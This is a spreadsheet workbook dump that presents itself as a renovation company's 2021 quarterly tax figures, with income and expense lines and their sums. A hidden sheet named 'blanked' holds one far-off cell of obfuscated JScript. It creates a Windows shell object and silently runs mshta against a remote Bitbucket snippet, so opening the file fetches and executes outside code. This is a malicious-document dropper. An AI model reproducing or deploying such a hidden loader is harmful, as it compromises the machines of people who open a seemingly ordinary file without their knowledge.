Workbook

Sheet FAIRBANKS RENOVATION (hidden)
A1: FAIRBANKS RENOVATION, INC 2021 TAXES
B2: Q1 | C2: Q2 | D2: Q3 | E2: Q4 | G2: TOTALS
A3: INCOME | B3: 26777.94 | C3: 44154.18 | D3: 41110.7 | E3: 28890.5 | G3: =SUM(B3:F3) -> 140933.32
A5: ADVERTISING | B5: 862 | C5: 1918 | D5: 1291.74 | E5: 1334.5 | G5: =SUM(B5:F5) -> 5406.24
A6: AUTO EXPENSE | B6: 14.09 | C6: 1048.5 | D6: 1316.36 | E6: 498.79 | G6: 2877.74
A7: AUTO PLATES | C7: 409.86 | G7: 409.86
A8: BANK CHARGES | B8: 14.5 | C8: 12 | D8: 12 | E8: 28.5 | G8: 67
A9: CITY OF LOUISVILLE | B9: 98 | C9: 76 | D9: 99 | E9: 25 | G9: 298
A10: COLORADO DEPT OF REVENUE | B10: 346.19 | C10: 285.8 | D10: 363.68 | E10: 345.25 | G10: 1340.92
A11: COLORADO STATE TREASURER | C11: 57.29 | D11: 50.15 | G11: 107.44
A12: CUSTOMER SUPPLIES | B12: 12007.26 | C12: 22178.16 | D12: 19152.87 | E12: 15002.38 | G12: 68340.67
A13: GAS | B13: 995.6 | C13: 1372.01 | D13: 2007.37 | E13: 1733.55 | G13: 6108.53
A14: INSURANCE | B14: 300 | C14: 702 | D14: 956.61 | E14: 1099.07 | G14: 3057.68
A15: IRS PAYMENTS | B15: 1497.75 | C15: 1109.54 | D15: 1139.79 | G15: 3747.08
A16: L & L TAX SERVICE | B16: 405 | C16: 110 | D16: 110 | E16: 110 | G16: 735
A17: OFFICE SUPPLIES | B17: 511.4 | C17: 552.32 | D17: 658.92 | E17: 731.6 | G17: 2454.24
A18: PARKING | D18: 25 | E18: 25 | G18: 50
A19: PHONE | B19: 701.87 | C19: 913.57 | D19: 501.48 | E19: 489 | G19: 2605.92
A20: RENT | B20: 5220 | C20: 5220 | D20: 5220 | E20: 5400 | G20: 21060
A21: SHOP | B21: 398.49 | C21: 713 | D21: 576 | E21: 522.7 | G21: 2210.19
A22: TRASH | B22: 383.03 | C22: 131.18 | D22: 145.16 | E22: 217.62 | G22: 876.99
A23: UNIFORMS | B23: 120 | C23: 224.88 | D23: 432.85 | E23: 243.95 | G23: 1021.68
A24: UTILITIES | B24: 796.77 | C24: 401.94 | D24: 808.37 | E24: 482.68 | G24: 2489.76
A25: VARTIV (CREDIT CARD) | B25: 124.64 | C25: 309.03 | D25: 67.91 | E25: 322.71
B26: =SUM(B5:B25) -> 24796.59 | C26: =SUM(C5:C25) -> 37745.08 | D26: =SUM(D5:D25) -> 34935.26 | E26: =SUM(E5:E25) -> 28612.3
B28: =B3-B26 -> 1981.35 | C28: =C3-C26 -> 6409.1 | D28: =D3-D26 -> 6175.44 | E28: =E3-E26 -> 278.2

Sheet FAIRBANKS RENOVATIONS

Sheet blanked (hidden)
TO1029: chuchukukukaokiwDasidow = new ActiveXObject('Wscript.Shell');KALYJA = "mshta https://bitbucket.org/!api/2.0/snippets/hogya/oB5ep7/b64bf6befc66a06d996ee7a59c21f189412a165e/files/charles";chuchukukukaokiwDasidow.run(KALYJA,0);
